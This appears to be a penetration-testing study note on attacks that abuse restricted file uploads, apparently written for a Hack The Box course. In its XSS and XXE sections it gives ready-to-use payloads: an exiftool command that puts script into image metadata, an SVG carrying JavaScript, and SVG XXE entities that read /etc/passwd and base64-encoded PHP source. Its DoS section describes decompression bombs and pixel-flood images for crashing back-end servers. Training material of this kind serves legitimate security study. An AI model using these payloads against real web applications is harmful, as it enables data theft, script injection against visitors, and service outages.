Skip to content

Limited File Uploads

  • Certain file types, like SVGHTMLXML, and even some image and document files, may allow us to introduce new vulnerabilities to the web application by uploading malicious versions of these files. This is why fuzzing allowed file extensions is an important exercise for any file upload attack. It enables us to explore what attacks may be achievable on the web server.

XSS

  • when web server allows html file upload
  • page execution does not take place like PHP
  • we can write js code to carry XSS/CSRF on whoever visits the uploaded html page.
  • web app that displays an image's metadata after its upload.
    • include the xss parameter in one of the metadata parameters.
      • exiftool -Comment=' "><img src=1 onerror=alert(window.origin)>' HTB.jpg
      • Check: exiftool HTB.jpg
  • with SVG (Scalable vector graphics) images.
    • they are xml based images that describe 2d vector graphics which the browser renders to an image.
    • eg: 
      <?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg xmlns="http://www.w3.org/2000/svg" version="1.1" width="1" height="1">
    <rect x="1" y="1" width="1" height="1" fill="green" stroke="black" />
    <script type="text/javascript">alert(window.origin);</script>
</svg>

XXE

  • svg can be injected with a malicious payload to elicit information
  • eg payload: 
    <?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<svg>&xxe;</svg>
  • getting System information is critical in exploitation.
  • For File Upload exploitation, it may allow us to locate the upload directory, identify allowed extensions, or find the file naming scheme, which may become handy for further exploitation.
  • eg payload to read source code: (use File Inclusion knowledge) 
    <?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
<svg>&xxe;</svg>

DoS

  • dos using xxe
  • Decompression Bomb using zip archives
    • If a web application automatically unzips a ZIP archive, it is possible to upload a malicious archive containing nested ZIP archives within it, which can eventually lead to many Petabytes of data, resulting in a crash on the back-end server.
  • Pixel Flood attack with some image files that utilize image compression, like JPG or PNG. We can create any JPG image file with any image size (e.g. 500x500), and then manually modify its compression data to say it has a size of (0xffff x 0xffff), which results in an image with a perceived size of 4 Gigapixels. When the web application attempts to display the image, it will attempt to allocate all of its memory to this image, resulting in a crash on the back-end server.
  • large file upload
  • directory traversal